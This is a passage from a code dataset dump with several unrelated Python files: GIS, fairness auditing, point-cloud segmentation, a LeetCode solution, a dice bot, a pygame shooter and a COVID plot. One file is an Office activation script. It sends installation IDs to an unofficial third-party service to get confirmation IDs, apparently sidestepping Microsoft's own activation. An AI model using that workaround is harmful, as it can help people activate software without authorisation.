QgsApplication.processingRegistry().removeProvider(self.provider)\n","repo_name":"Ruphai/GIS_Application_Development","sub_path":"landscapemetrics/LandscapeMetrics.py","file_name":"LandscapeMetrics.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"41377224319","text":"#Bias & Fairness\n### Carga modelo y preparación de tabla aequitas\nimport numpy as np\nimport pickle as picklea\nimport pandas as pd\nfrom Class_Eda import Eda\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nimport aequitas\nimport seaborn as sns\nfrom aequitas.group import Group\nfrom aequitas.bias import Bias\nfrom aequitas.fairness import Fairness\nfrom aequitas.plotting import Plot\nfrom aequitas.preprocessing import preprocess_input_df\nfrom aequitas.group import Group\n\n#Instanciamos el objeto Eda\nobjEda = Eda()\n#Inicializamos los parámetros principales (por el momento, sólo es uno: la ruta de la fuente de datos)\nobjEda.strRutaDataSource='Transit_modeling.csv' #El archivo que sale del feature engineering\n#Proceso de carga\nobjEda.Cargar_Datos()\n#Proceso de limpieza\nobjEda.Limpiar_Datos()\n#Guardamos el arreglo en la nueva columna\nobjEda.pdDataSet['y'] = objEda.pdDataSet.apply(lambda x: (x.etiqueta1), axis=1)\n\n################## Separamos las features de lo que vamos a predecir\npdX, pdY = objEda.SepararFeaturesYPred('y')\n\n################## Separamos nuestros datos en entrenamiento y pruebas utilizando la proporción 80-20\nobjEda.Generar_Train_Test(pdX, pdY, 0.2)\n\n################## Preparamos las variables que imputaremos\nobjEda.listTransform=[''] #Limpiamos la propiedad de lista de features a imputar\nobjEda.Agregar_Features_Transform('median', 'vuelos_afectados') #no hizo nada porque están como NaN\n\n################## Imputamos sobre el conjunto de entrenamiento y prueba\nobjEda.X_train = objEda.Imputar_Features(objEda.X_train)\nobjEda.X_test = objEda.Imputar_Features(objEda.X_test)\n\n#Convertir el numpy a dataframe\nX_test_df = pd.DataFrame(objEda.X_test)\n\n#Dejar el día de la semana\nX_test_df = X_test_df[2]\n\n#Cambiar el nombre de la columnas para Aquitas\nlabels_train_df = ['day_sem']\nlabels_test_df = labels_train_df\n\nX_test_df = pd.DataFrame(X_test_df) #Se convierte en numpy array en Pandas\nX_test_df.columns=labels_train_df\n\n#Importamos modelo\npickleName = 'ModeloFinalRita.p'\npickleFile = open(pickleName, 'rb')\nmodel = pickle.load(pickleFile)\npickleFile.close()\nmodel\n\n# También importamos los conjuntos de prueba utilizados para Rita\n\npickleName = 'X_testRita.p'\npickleFile = open(pickleName, 'rb')\nX_test = pickle.load(pickleFile)\npickleFile.close()\n\npickleName = 'Y_testRita.p'\npickleFile = open(pickleName, 'rb')\nY_test = pickle.load(pickleFile)\npickleFile.close()\n\n#Hacemos el fit\nmodel.fit(X_train, Y_train)\n\n#Función que realiza las predicciones\npredict_model=lambda x: model.predict_proba(x).astype(float)\n\n#predict_fn_model = lambda x: model.predict_proba(x).astype(float)\npredict_model\n\n#Cambiar el nombre de la columnas para Aquitas\nlabels_train = ['count','max','nvue_falt','vuelos_afectados','lunes','martes','miercoles','jueves','viernes','sabado','domingo']\nlabels_test = labels_train\n\nX_test = pd.DataFrame(X_test) #Se convierte en numpy array en Pandas\nX_test.columns=labels_train\nX_test.head()\n\n#Renombramos las variables según la estructura el input data\npredicciones=pd.DataFrame(model.predict(X_test))\npredicciones=predicciones.rename(columns={0: \"score\"})\n\n#Modificaciones a Y_test\n#y_test=pd.DataFrame(Y_test)\ny_test=Y_test.rename(columns={\"y\": \"label_value\"})\ny_test.reset_index(drop=True, inplace=True)\ny_test.shape\n\n#Unimos los dataframe para generar el input data\ndatos_aequitas=pd.concat([predicciones,y_test,X_test,X_test_df], axis=1)\n#Hasta aquí es la preparación de datos para aequitas ------------------------------------------------------------\n\n#Filtrar los datos de aequitas para calculo de FNR\ndatos_aequitas = datos_aequitas[['score','label_value','day_sem']]\ndatos_aequitas.head()\n\n#Instalación de Aequitas\n#pip install aequitas\n\ng = Group()\nxtab, _ = g.get_crosstabs(datos_aequitas)\n#xtab contiene calculos de todas la métricas de FP, FN, TP, TN\n\n#Calculo de Bias\nb = Bias()\nbdf = b.get_disparity_predefined_groups(xtab,\n original_df=datos_aequitas,\n ref_groups_dict={'day_sem':'e:viernes'},\n alpha=0.05,\n check_significance=False)\n\n\n#Calculo de Fairness\nf = Fairness()\nfdf = f.get_group_value_fairness(bdf) #Mismo grupo de referencia\n\n#Exportar archivos\nruta = \"bdf.csv\"\nbdf.to_csv(ruta)\n\nruta = \"fdf.csv\"\nfdf.to_csv(ruta)\n","repo_name":"Millan13/dpa_equipo2","sub_path":"Scripts/Bias_Fairness.py","file_name":"Bias_Fairness.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31167001017","text":"#3D point clud segmentation based of normals and distances\n\nimport cv2\nimport numpy as np\nimport open3d as o3d\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport matplotlib.pyplot as plt\n\nfrom open3d import *\ndef get_vector_angle(u,v):\n #print(u,v)\n uv=np.dot(u,v)\n #mu=np.linalg.norm(u)\n #mv=np.linalg.norm(v)\n ang = np.arccos(uv)\n ang = ang*180/np.pi\n if (ang > 90):\n ang = 180 - ang\n return (ang)\ndef get_plane_distance(n,p):\n d=np.dot(n,p)\n return (d)\n\ndef get_distance_group(dist,group1,distance_resolution):\n group={}\n group_center={}\n group[0]=[group1[0]]\n group_center[0]=dist[0]\n u=dist[0]\n \n for i in np.arange(1,len(group1)):\n v=dist[i]\n for y in group_center: #Add the new member in the matching group\n u=group_center[y]\n if abs(u-v) <=distance_resolution:\n group[y] +=[group1[i]]\n break\n else: #Create a new group center\n new_group=len(group_center)\n group_center[new_group]=v\n group[new_group]=[group1[i]]\n return (group, group_center)\n \n\nif __name__ == \"__main__\":\n angle_resolution=10\n distance_resolution=0.05\n thresold=150\n print(\"Load a ply point cloud and render it\")\n #pcd = o3d.io.read_point_cloud(\"c:/ply/test.ply\")\n \n #pcd = o3d.io.read_point_cloud(\"../../TestData/fragment.ply\")\n\n color_raw = read_image(\"C:/Users/DELL/Python37/Rachna/data/rgb_2.jpg\")\n depth_raw = read_image(\"C:/Users/DELL/Python37/Rachna/data/depth_2.png\")\n #color_raw = read_image(\"C:/Users/DELL/Python37/Open3D-master/examples/TestData/RGBD/other_formats/TUM_color.png\")\n #depth_raw = read_image(\"C:/Users/DELL/Python37/Open3D-master/examples/TestData/RGBD/other_formats/TUM_depth.png\")\n \n rgbd_image = o3d.create_rgbd_image_from_tum_format(color_raw, depth_raw);\n \n \n pcd = o3d.create_point_cloud_from_rgbd_image(rgbd_image, o3d.PinholeCameraIntrinsic(\n o3d.PinholeCameraIntrinsicParameters.PrimeSenseDefault))\n #Flip it, otherwise the pointcloud will be upside down\n pcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n \n #o3d.io.write_point_cloud(\"C:/Users/DELL/Python37/Rachna/rgb_3.pcd\", pcd)\n #o3d.io.write_point_cloud(\"C:/Users/DELL/Python37/Rachna/test.ply\", pcd)\n if not pcd.has_points():\n print(\"Unable to propely load point cloud. check the file name and location\")\n exit()\n print(pcd)\n o3d.visualization.draw_geometries([pcd])\n downpcd = o3d.geometry.voxel_down_sample(pcd, voxel_size=0.005)\n cl, ind = o3d.geometry.statistical_outlier_removal(downpcd,nb_neighbors=20, std_ratio=2.0)\n \n downpcd = o3d.geometry.select_down_sample(downpcd, ind)\n o3d.geometry.estimate_normals(downpcd,search_param=o3d.geometry.KDTreeSearchParamHybrid(\n radius=0.1, max_nn=30))\n #o3d.visualization.draw_geometries([downpcd])\n \n #print(downpcd)\n \n #downpcd=pcd\n #o3d.visualization.draw_geometries([downpcd])\n\n normals= np.asarray(downpcd.normals)\n group={}\n group_center={}\n group[0]=[0]\n group_center[0]=normals[0]\n u=normals[0]\n for i in np.arange(1,len(normals)):\n v=normals[i]\n for y in group_center: #Add the new member in the matching group\n u=group_center[y]\n if get_vector_angle(u,v) <=angle_resolution:\n group[y] +=[i]\n break\n else: #Create a new group center\n new_group=len(group_center)\n group_center[new_group]=v\n group[new_group]=[i]\n\n\n\n planes={}\n no_of_planes=0\n for i in group_center: \n n=group_center[i]\n dist=[]\n for idx in group[i]:\n p= downpcd.points[idx]\n dist+=[get_plane_distance(n,p)]\n## plt.plot(np.sort(dist))\n## plt.show()\n a,b=get_distance_group(dist,group[i],distance_resolution)\n planes[i]=[a]\n no_of_planes+=len(b)\n\n jet=plt.get_cmap('jet')\n cNorm = colors.Normalize(vmin=0,vmax=10*no_of_planes)\n scalarMap=cmx.ScalarMappable(norm=cNorm,cmap=jet)\n\n current_plane_no=0\n no_large_planes=0\n for i in planes:\n p=planes[i]\n for idx in p[0]:\n a=p[0][idx]\n if len(a) bool:\n mag_hash = {}\n ran_hash = {}\n\n for c in magazine:\n if c in mag_hash:\n mag_hash[c] += 1\n else:\n mag_hash[c] = 1\n\n for c in ransomNote:\n if c in ran_hash:\n ran_hash[c] += 1\n else:\n ran_hash[c] = 1\n\n for c in ran_hash:\n if c not in mag_hash or mag_hash[c] < ran_hash[c]:\n return False\n\n return True","repo_name":"mac718/dsa","sub_path":"LeetCode/ransom_note.py","file_name":"ransom_note.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73486766969","text":"import argparse\nimport subprocess\nimport os\nimport re\nimport requests\nfrom configparser import ConfigParser\nimport traceback\n\nclass OSPPModule:\n def __init__(self):\n self.ospp_commands = {\n # Global Options\n \"activate_office_product\": \"/act\",\n \"install_product_key\": \"/inpkey:value\",\n \"uninstall_product_key\": \"/unpkey:value\",\n \"install_license\": \"/inslic:value\",\n \"display_license_info\": \"/dstatus\",\n \"display_all_license_info\": \"/dstatusall\",\n \"display_activation_failure_history\": \"/dhistoryacterr\",\n \"display_installation_id\": \"/dinstid\",\n \"activate_with_confirmation_id\": \"/actcid:value\",\n \"reset_licensing_status\": \"/rearm\",\n \"reset_license_status_with_skuid\": \"/rearm:value\",\n \"display_error_description\": \"/ddescr:value\",\n\n # KMS Client Options\n \"display_kms_activation_history\": \"/dhistorykms\",\n \"display_kms_client_machine_id\": \"/dcmid\",\n \"set_kms_host_name\": \"/sethst:value\",\n \"set_kms_port\": \"/setprt:value\",\n \"remove_kms_host_name\": \"/remhst\",\n \"permit_or_deny_kms_host_caching\": \"/cachst:value\",\n \"set_volume_activation_type\": \"/actype:value\",\n \"set_kms_srv_records_domain\": \"/skms-domain:value\",\n \"clear_kms_srv_records_domain\": \"/ckms-domain\",\n\n # Token Options\n \"display_installed_token_activation_issuance_licenses\": \"/dtokils\",\n \"uninstall_installed_token_activation_issuance_license\": \"/rtokil:value\",\n \"set_token_based_activation_flag\": \"/stokflag\",\n \"clear_token_based_activation_flag\": \"/ctokflag\",\n \"display_token_based_activation_certificates\": \"/dtokcerts\",\n \"token_activate\": \"/tokact:value1:value2\",\n }\n\n def find_ospp(self):\n # Define the list of Office versions (4, 5, and 6 in this case)\n office_versions = [4, 5, 6]\n\n for version in office_versions:\n # Check if the ospp.vbs file exists in the 32-bit Program Files directory\n program_files_path = os.environ.get(\"ProgramFiles\")\n ospp_vbs_path = os.path.join(program_files_path, f\"Microsoft Office\\\\Office1{version}\\\\ospp.vbs\")\n\n if os.path.exists(ospp_vbs_path):\n return ospp_vbs_path\n\n # Check if the ospp.vbs file exists in the 64-bit Program Files directory\n program_files_x86_path = os.environ.get(\"ProgramFiles(x86)\")\n ospp_vbs_path_x86 = os.path.join(program_files_x86_path, f\"Microsoft Office\\\\Office1{version}\\\\ospp.vbs\")\n\n if os.path.exists(ospp_vbs_path_x86):\n return ospp_vbs_path_x86\n\n return None\n\n def execute_ospp_command(self, command):\n ospp_path = self.find_ospp()\n if not ospp_path:\n raise FileNotFoundError(\"--- ERROR --- \\n -Errmsg: ospp.vbs not found. Please check the path.\")\n\n try:\n ospp_command = [\"cscript\", ospp_path, command]\n result = subprocess.run(ospp_command, capture_output=True, text=True)\n return result.stdout.strip()\n except subprocess.CalledProcessError as e:\n print(\"--- ERROR --- \\n -Errmsg: Error executing ospp.vbs:\", e)\n\n def run_ospp_command_user_input(self, command):\n \n if command in self.ospp_commands:\n ospp_command = self.ospp_commands[command]\n if \":value\" in ospp_command:\n value = input(f\"Enter the value for {ospp_command.split(':')[0]}: \").strip()\n if not value:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Value cannot be empty. Please try again.\")\n if 'inpkey' in ospp_command:\n #remove any dashes\n value = value.replace('-','').replace(' ', '')\n value = '-'.join(value[i:i+5] for i in range(0, len(value), 5))\n ospp_command = ospp_command.replace(\":value\", f\":{value}\")\n return self.execute_ospp_command(ospp_command)\n else:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Invalid command.\")\n \n def run_ospp_command(self, command, value=None):\n if command in self.ospp_commands:\n ospp_command = self.ospp_commands[command]\n if \":value\" in ospp_command:\n if not value:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Command needs a value to proceed. Please provide a valid value\")\n ospp_command = ospp_command.replace(\":value\", f\":{value}\")\n return self.execute_ospp_command(ospp_command)\n else:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Invalid command.\")\n \n\nclass OfficeActivation:\n def __init__(self) -> None:\n self.config = ConfigParser()\n self.config.read('config.ini')\n self.ospp = OSPPModule()\n self.actions = {\n 'activate_office_with_product_key': self.pid_activation,\n 'activate_office_with_installation_id': self.iid_activation,\n 'activate_office_with_confirmation_id': self.cid_activation,\n }\n self.ospp_actions = {\n 'display_installation_id': self.ospp.run_ospp_command,\n 'display_license_info': self.ospp.run_ospp_command\n }\n self.iid = ''\n self.cid = ''\n self.api_key = self.config.get('user_config', 'api_key')\n \n @property\n def api_url(self):\n return f'http://getcid.info/api/{self.iid}/{self.api_key}'\n \n def run_actions(self, action):\n if action in self.actions:\n return self.actions[action]()\n elif action in self.ospp_actions:\n print(self.ospp_actions[action](action))\n \n \n def print_available_options(self):\n print(\"Available options for Office Activation:\")\n for idx, option in enumerate(self.actions.keys(), 1):\n print(f\"{idx}. {option}\")\n \n print('\\nOptions for displaying Office info:')\n for idx, option in enumerate(self.ospp_actions.keys(), 4):\n print(f\"{idx}. {option}\")\n\n\n def get_action_by_number(self, number):\n if number < 1 or number > len(self.actions)+len(self.ospp_actions):\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Invalid input. Please enter a valid number or 'exit' to quit \\n-------------\")\n \n return list(self.actions.keys() if number < 4 else self.ospp_actions)[number - 1 if number < 4 else number - 4]\n \n def get_installation_id(self):\n try:\n output = self.ospp.run_ospp_command('display_installation_id')\n # Use regex to find the lines containing \"Installation ID for\"\n pattern = r\"Installation ID for:[^\\n]*\"\n matches = re.findall(pattern, output)\n\n installation_ids = []\n for match in matches:\n # Check if the line contains \"Retail edition\" or \"MSDNR_Retail edition\"\n if \"Retail edition\" in match or \"MSDNR_Retail edition\" in match:\n # Extract the installation ID using regex\n id_pattern = r\"(?<=: )(\\d+)(?=[^:]*$)\"\n id_match = re.search(id_pattern, match)\n if id_match:\n installation_id = id_match.group(1)\n installation_ids.append(installation_id)\n \n if installation_ids and len(installation_ids) == 1:\n return installation_ids[0]\n else:\n raise Exception(\"--- ERROR --- \\n -Errmsg: Installation ID not found/multiple IDs found in the output \\n -------------\")\n\n except subprocess.CalledProcessError as e:\n print(\"--- ERROR --- \\n -Errmsg: Error retrieving installation ID:\", e, ' \\n -------------')\n \n def pid_activation(self):\n #install product key\n install_prod_key_command = self.ospp.run_ospp_command_user_input('install_product_key')\n print(install_prod_key_command)\n self.iid = self.get_installation_id()\n if not self.iid:\n raise ValueError('--- ERROR --- \\n -Errmsg: No Installation ID returned \\n -------------')\n \n #make request for confirmation id\n response = requests.get(self.api_url)\n response.raise_for_status()\n self.cid = response.json()\n with open('cid.txt', 'w') as file:\n # Write cid to file incase of failure\n print('------------------------------------ Outputting Confirmation ID to cid.txt --------------------------------------')\n print('--- In the event the cid activation failed, please proceed to option 3 and key in the cid from the text field ---')\n print('-----------------------------------------------------------------------------------------------------------------')\n file.write(str(self.cid))\n \n if not self.cid:\n raise ValueError('--- ERROR --- \\n -Errmsg: Confirmation ID cannot be empty \\n -------------')\n activate = self.ospp.run_ospp_command('activate_with_confirmation_id', self.cid)\n print(activate)\n \n def iid_activation(self):\n self.iid = input('Please enter the Installation ID: ')\n if not self.iid or len(self.iid) != 63:\n raise ValueError('--- ERROR --- \\n -Errmsg: Please enter a valid Installation ID \\n -------------')\n \n #make request for confirmation id\n response = requests.get(self.api_url)\n response.raise_for_status()\n self.cid = response.json()\n with open('cid.txt', 'w') as file:\n # Write cid to file incase of failure\n file.write(str(self.cid))\n \n if not self.cid:\n raise ValueError('--- ERROR --- \\n -Errmsg: Confirmation ID cannot be empty \\n -------------')\n activate = self.ospp.run_ospp_command('activate_with_confirmation_id', self.cid)\n print(activate)\n\n def cid_activation(self):\n self.cid = input('Please enter the Confirmation ID: ')\n \n if not self.cid or len(self.cid) != 48:\n raise ValueError('--- ERROR --- \\n -Errmsg: Please enter a valid Confirmation ID \\n -------------')\n activate = self.ospp.run_ospp_command('activate_with_confirmation_id', self.cid)\n print(activate)\n \n def start(self):\n print(\"--- Welcome to the Office Activation Script! ---\")\n while True:\n self.print_available_options()\n user_input = input(\"Enter the number of the command you want to run (or 'exit' to quit): \").lower()\n\n if user_input == \"exit\":\n break\n\n try:\n action_number = int(user_input)\n action = self.get_action_by_number(action_number)\n if action:\n self.run_actions(action)\n else:\n print(\"--- ERROR --- \\n -Errmsg: Invalid command number. \\n -------------\")\n except ValueError as e:\n print(str(e))\n except Exception as e:\n traceback.print_exc()\n print(str(e))\n\n\nif __name__ == \"__main__\":\n activation_script = OfficeActivation()\n activation_script.start()\n","repo_name":"ashe0047/office-activation-script","sub_path":"ms_office_activation.py","file_name":"ms_office_activation.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28923242543","text":"# 设置属性指令\nimport re\nimport os\nimport json\n\ncommons = {\n '力量': ['str'], 'str': ['力量'],\n '敏捷': ['dex'], 'dex': ['敏捷'],\n '意志': ['pow', 'san', 'san值', '理智', '理智值'], 'pow': ['意志', 'san', 'san值', '理智', '理智值'],\n '体质': ['con'], 'con': ['体质'],\n '外貌': ['app'], 'app': ['外貌'],\n '教育': ['知识', 'edu'], '知识': ['教育', 'edu'], 'edu': ['教育', '知识'],\n '体型': ['siz'], 'siz': ['体型'],\n '智力': ['灵感', 'int'], '灵感': ['智力', 'int'], 'int': ['智力', '灵感'],\n 'san': ['san值', '理智', '理智值'], 'san值': ['san', '理智', '理智值'], '理智': ['san', 'san值', '理智值'], '理智值': ['san', 'san值', '理智'],\n '幸运': ['运气'], '运气': ['幸运'],\n 'mp': ['魔法'], '魔法': ['mp'],\n 'hp': ['体力'], '体力': ['hp'],\n '计算机': ['计算机使用', '电脑'], '计算机使用': ['计算机', '电脑'], '电脑': ['计算机', '计算机使用'],\n '信用': ['信誉', '信用评级'], '信誉': ['信用', '信用评级'], '信用评级': ['信用', '信誉'],\n '克苏鲁': ['克苏鲁神话', 'cm'], '克苏鲁神话': ['克苏鲁', 'cm'], 'cm': ['克苏鲁', '克苏鲁神话'],\n '汽车': ['驾驶', '汽车驾驶'], '驾驶': ['汽车', '汽车驾驶'], '汽车驾驶': ['汽车', '驾驶'],\n '步枪': ['霰弹枪', '步霰'], '霰弹枪': ['步枪', '步霰'], '步霰': ['步枪', '霰弹枪'],\n '图书馆': ['图书馆使用'], '图书馆使用': ['图书馆'],\n '开锁': ['撬锁', '锁匠'], '撬锁': ['开锁', '锁匠'], '锁匠': ['开锁', '撬锁'],\n '博物学': ['自然学'], '自然学': ['博物学'],\n '领航': ['导航'], '导航': ['领航'],\n '重型操作': ['重型机械', '操作重型机械', '重型'], '重型机械': ['重型操作', '操作重型机械', '重型'], '操作重型机械': ['重型操作', '重型机械', '重型'], '重型': ['重型操作', '重型机械', '操作重型机械'],\n}\n\n\ndef set_attributes(text: str, group_id: str, user_id: str) -> dict | None:\n '''\n 接口功能: 设置角色卡属性。\n\n 参数:\n\n text: str 去除指令文本后的用户纯文本信息。\n group_id: str 当前群号。\n user_id: str 用户qq号。\n\n 返回值:\n : dict | None 包含数据和请求处理状态 status 的字典。\n '''\n attrs = re.findall(r'[\\D]+[\\d]+', text)\n if len(attrs) == 0:\n return None\n attrs_new = {}\n for attr in attrs:\n aname = re.findall(r'[^-+\\d\\s]+', attr)[0]\n avalue = re.findall(r'[-+\\d]+', attr)[0]\n attrs_new[aname] = avalue\n path_ = f'data/toidice/users/{user_id}'\n if not os.path.exists(path_):\n return {'status': 'USER_NOTFOUND'}\n datas = get_playercharacter(path_, group_id)\n if datas is None:\n return {'status': 'PC_NOTFOUND'}\n pc = datas['pc']\n for kv in attrs_new.items():\n if re.search(r'[-+]', kv[1]):\n avalue_new = pc['attrs'][kv[0]]+int(kv[1])\n pc['attrs'][kv[0]] = avalue_new\n else:\n avalue_new = int(kv[1])\n pc['attrs'][kv[0]] = avalue_new\n if kv[0] in commons.keys():\n for key in commons[kv[0]]:\n pc['attrs'][key] = avalue_new\n with open(datas['path_pc'], 'w') as f:\n f.write(json.dumps(pc, ensure_ascii=False))\n f.close()\n return {'cname': datas['cname'], 'status': 'SET_OK'}\n\n\ndef get_playercharacter(path_: str, group_id: str) -> dict | None:\n '''\n (内部接口)\n 接口功能: 获取角色卡信息。\n\n 参数:\n\n path_: str 用户角色卡文件夹路径。\n group_id: str 当前群号。\n\n 返回值:\n : dict | None 包含角色卡路径 path_pc 、角色卡名称 cname 和角色卡信息 pc 的字典。\n '''\n for root, dirs, files in os.walk(path_):\n for file in files:\n with open(f'{path_}/{file}', 'r') as f:\n pc = json.load(f)\n f.close()\n try:\n if pc['groups'][group_id] == 1:\n return {'path_pc': f'{path_}/{file}', 'cname': file.replace('.json', ''), 'pc': pc}\n except KeyError:\n continue\n return None\n","repo_name":"roadranmee-orangecuk/nonebot_plugin_toidice","sub_path":"set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34311479215","text":"# MD BAHAUDDIN\r\n# NATIONAL INSTITUTE OF TECHNOLOGY\r\n# Space Invaders\r\n\r\n# pyGames.org \r\n# download pip by 'pip install pygame' for package manager\r\nimport random\r\nimport pygame\r\n# import pygame in our profile\r\nimport math\r\nfrom pygame import mixer\r\n# for music \r\n\r\n# initialize the pygame\r\npygame.init() \r\n# without it game will not work\r\n\r\n# creating window/screen\r\nscreen = pygame.display.set_mode((800,600))\r\n# Width, height\r\n# inside bracket there is another bracket bcz it is tuple and without it wont work\r\n# After few seconds windows go away :(\r\n# So we will create infinite loop \r\n\r\n# Background Music \r\nmixer.music.load('background.mp3')\r\nmixer.music.play(-1)\r\n\r\n# Title & Icon of the window\r\npygame.display.set_caption(\"Space Invaders\")\r\nicon = pygame.image.load(\"ufo.png\")\r\npygame.display.set_icon(icon)\r\n\r\n# Player\r\nplayerImg = pygame.image.load('space-invaders.png')\r\nplayerX = 370\r\nplayerY = 480\r\nplayerX_change = 0\r\n# values depend on the screen,, which is set such that image will appear in the middle \r\n\r\n# Enemy\r\nEnemyImg = []\r\n# this is list i,e, array\r\nenemyX = []\r\nenemyY = []\r\nEnemyX_change = []\r\nEnemyY_change = []\r\nnum_of_enemies = 3\r\n\r\nfor i in range(num_of_enemies):\r\n EnemyImg.append(pygame.image.load('enemy.png'))\r\n enemyX.append(random.randint(0,800))\r\n enemyY.append(random.randint(50,180))\r\n EnemyX_change.append(5)\r\n EnemyY_change.append(40)\r\n\r\n\r\n\r\n\r\n# Background set\r\nbackgroundImg = pygame.image.load('background.png')\r\n\r\n# Bullet\r\n# Ready - you can't see the bullet before fire\r\nbulletImg = pygame.image.load('bullet.png')\r\nbulletX = 0\r\nbulletY = 480\r\nbulletX_change = 0\r\nbulletY_change = 10\r\nbullet_state = \"ready\"\r\n\r\n# FONT \r\n# Score card\r\nscore_value = 0 \r\nfont = pygame.font.Font('freesansbold.ttf',22)\r\ntextX = 10\r\ntextY = 10\r\n# positions x,y\r\n\r\n# Game Over \r\nover_font = font = pygame.font.Font('freesansbold.ttf',66)\r\n\r\ndef show_score(x,y):\r\n score = font.render(\"Score : \" + str(score_value), True, (255,255,255))\r\n screen.blit(score, (x,y))\r\n\r\ndef game_over_text():\r\n over_text = over_font.render(\"GAME OVER\", True, (255,255,255))\r\n screen.blit(over_text, (200,250))\r\n # we have to render the text before printing then print/show \r\n\r\n\r\n# creating function , loading image , (image x location, image y location) \r\ndef player(x,y):\r\n screen.blit(playerImg, (x,y))\r\n# added x, y so that player can move on x- & y- axes\r\n\r\n# Creating enemy \r\ndef enemy(x,y, i):\r\n screen.blit(EnemyImg[i], (x,y))\r\n\r\ndef background():\r\n screen.blit(backgroundImg, (0,0))\r\n\r\ndef fire_bullet(x,y):\r\n global bullet_state\r\n bullet_state = \"fire\"\r\n screen.blit(bulletImg,(x+16,y+10))\r\n\r\n# for Collision of bullet with enemy we use this function\r\n# they collide when the distance between them becomes 0 \r\ndef isCollision(enemyX,enemyY,bulletX,bulletY):\r\n distance = math.sqrt(math.pow(bulletX-enemyX,2) + math.pow(bulletY-enemyY,2))\r\n if distance < 50 :\r\n return True\r\n else:\r\n return False \r\n\r\n\r\n\"\"\"while True:\r\n pass\"\"\"\r\n# running this loop will hang the program,so we will add quit button\r\n# every things happened by keyboard, cancel/exit button, left, right, up, down bottons are event\r\n\r\n# Game Loop \r\nrunnig = True\r\n# running is close button \r\nwhile runnig:\r\n # we change the background\r\n # we added the red (RGB) color but we did not update the screen\r\n screen.fill((1,100,1))\r\n background()\r\n for eventt in pygame.event.get():\r\n if eventt.type == pygame.QUIT:\r\n runnig = False\r\n \r\n # if keystroke is pressed whether left or right\r\n if eventt.type == pygame.KEYDOWN:\r\n # means keystroke pressed by keyboard\r\n if eventt.key == pygame.K_LEFT:\r\n # print(\"Left is pressed\")\r\n playerX_change = -6\r\n if eventt.key == pygame.K_RIGHT:\r\n # print(\"RIGHT is pressed\")\r\n playerX_change = 6\r\n\r\n # for bullet, if space is precessed bullet will show\r\n # since bullet follow space craft so we use bulletX var...\r\n\r\n if eventt.key == pygame.K_SPACE:\r\n if bullet_state is \"ready\":\r\n bullet_Sound = mixer.Sound('laser.wav')\r\n bullet_Sound.play()\r\n bulletX = playerX\r\n fire_bullet(bulletX,bulletY)\r\n\r\n # keydown means pressing a key , keyup means releasing a key \r\n if eventt.type == pygame.KEYUP:\r\n if eventt.key == pygame.K_LEFT or eventt.key == pygame.K_RIGHT:\r\n # print(\"Keystroke is released\")\r\n playerX_change = 0\r\n\r\n\r\n\r\n # we added player after screen.fill so that player will come after screen background \r\n # otherwise background will overlap the player\r\n playerX += playerX_change\r\n # to change the position of spaceship \r\n \r\n\r\n # Spaceship should not go beyond the screen\r\n if playerX <= 0:\r\n playerX = 0\r\n\r\n if playerX >= 736:\r\n playerX = 736\r\n \r\n # Enemy \r\n # Enemy movement \r\n for i in range(num_of_enemies):\r\n\r\n # Game over \r\n if enemyY[i] > 430:\r\n for j in range(num_of_enemies):\r\n enemyY[i]= 2000\r\n game_over_text()\r\n break\r\n\r\n enemyX[i] += EnemyX_change[i]\r\n \r\n if enemyX[i] <= 0:\r\n EnemyX_change[i] = 5\r\n enemyY[i] += EnemyY_change[i]\r\n elif enemyX[i] >= 770:\r\n EnemyX_change[i] = -5\r\n enemyY[i] += EnemyY_change[i]\r\n\r\n # Collision condition\r\n collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)\r\n if collision:\r\n explosion_Sound = mixer.Sound('explosion.wav')\r\n explosion_Sound.play()\r\n bulletY = 480\r\n bullet_state = \"ready\"\r\n score_value += 100\r\n # print(score)\r\n enemyX[i] = random.randint(0,800)\r\n enemyY[i] = random.randint(50,180)\r\n \r\n # displaying enemy \r\n enemy(enemyX[i],enemyY[i], i)\r\n \r\n\r\n # BUllet Movement \r\n if bulletY <= 0:\r\n bulletY = 480\r\n bullet_state = \"ready\"\r\n\r\n if bullet_state is \"fire\":\r\n fire_bullet(bulletX,bulletY)\r\n bulletY -= bulletY_change\r\n # bullet will fire but can not fire again \r\n\r\n \r\n\r\n # displaying player craft\r\n player(playerX,playerY)\r\n \r\n show_score(textX, textY)\r\n # updating the screen\r\n pygame.display.update()\r\n","repo_name":"mbahau/Space-Invaders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38021390093","text":"'''\r\n* Zaman Serisi Tahmini Uygulamaları\r\n* Corona Virüs Günlük Veriler Işığında Plot Grafikleri\r\n* Tarih: 03 Nisan 2020\r\n* Hazırlayan: Bilishim Siber Güvenlik ve Yapay Zeka\r\n* Bu çalışmalar yalnızca ARGE ve bilgiyi geliştirmek maksadıyla hazırlanmış olup, herhangi bir resmi temsil ya da bağlayıcılığı yoktur.\r\n'''\r\nfrom pandas import read_csv\r\nfrom pandas import Series\r\nfrom pandas import DataFrame\r\nfrom matplotlib import pyplot\r\nfrom pandas import TimeGrouper\r\nfrom pandas import concat\r\n\r\n#Günlük Onaylı Vaka Zaman Grafiği\r\nseries = read_csv('corona-virus-istatistikleri-resampled.csv', header=0, usecols=[2])\r\nseries.plot()\r\npyplot.show()\r\n\r\n\r\n#Günlük 